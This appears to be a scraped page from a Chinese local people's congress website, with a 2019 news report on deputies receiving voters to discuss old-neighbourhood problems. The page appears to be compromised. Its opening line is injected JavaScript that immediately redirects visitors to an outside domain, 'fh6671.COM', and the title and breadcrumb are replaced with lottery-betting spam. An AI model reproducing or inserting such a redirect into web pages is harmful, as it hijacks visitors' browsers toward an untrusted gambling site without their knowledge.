function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新代表履职  >>  代表活动  
胜利社区人大代表工作站开展人大代表集中接待选民活动
来源: 嘉峪关日报      日期: 2019-12-19      作者: 赵明霞      点击数:

胜利社区人大代表工作站开展人大代表集中接待选民活动

王进平参加

嘉峪关日报(记者赵明霞)12月17日,胜利社区人大代表工作站开展人大代表集中接待选民活动。市人大常委会党组书记、主任王进平,市教育局二级巡视员、局长王林以市人大代表身份,与选民“面对面”交流,听取基层意见建议,履行人大代表倾听民声、集中民智、反映民意、为民代言职责。

座谈会上,选民围绕老旧小区加装电梯、电网电线乱拉乱搭、物业管理、狗患等问题,畅所欲言,充分发表意见建议。

   王进平认真听取选民代表的意见建议,不时与大家互动交流,并对相关建议和问题提出了解决意见建议。他强调,人民代表大会制度是我们党密切联系人民群众的重要制度平台。人大代表接待选民代表依法履职的表现,也是代表密切联系选民和人民群众的有效途径。市人大代表要深入学习贯彻习近平新时代中国特色社会主义思想,特别是习近平总书记关于坚持和完善人民代表大会制度的重要思想,进一步增强“四个意识”、坚定“四个自信”、做到“两个维护”,更好地发挥人大职能作用,扎实推进人大工作与时俱进。要结合国家老旧小区改造相关政策,加快推进老旧小区改造,规范业主代表大会,用市场化手段推进小区物业管理水平高质量发展,不断提升基层治理能力,建立共治共建共享的长效化治理模式,持续提升居民幸福感、获得感。要督促政府有关部门进一步提升人大代表意见建议办理工作,有效提升建议议案办结率,实现答复率、办结率双提升,真正把人民群众的利益实现好、维护好、发展好

       王进平还与选区其他两名市人大代表视察了社区老旧小区改造工作。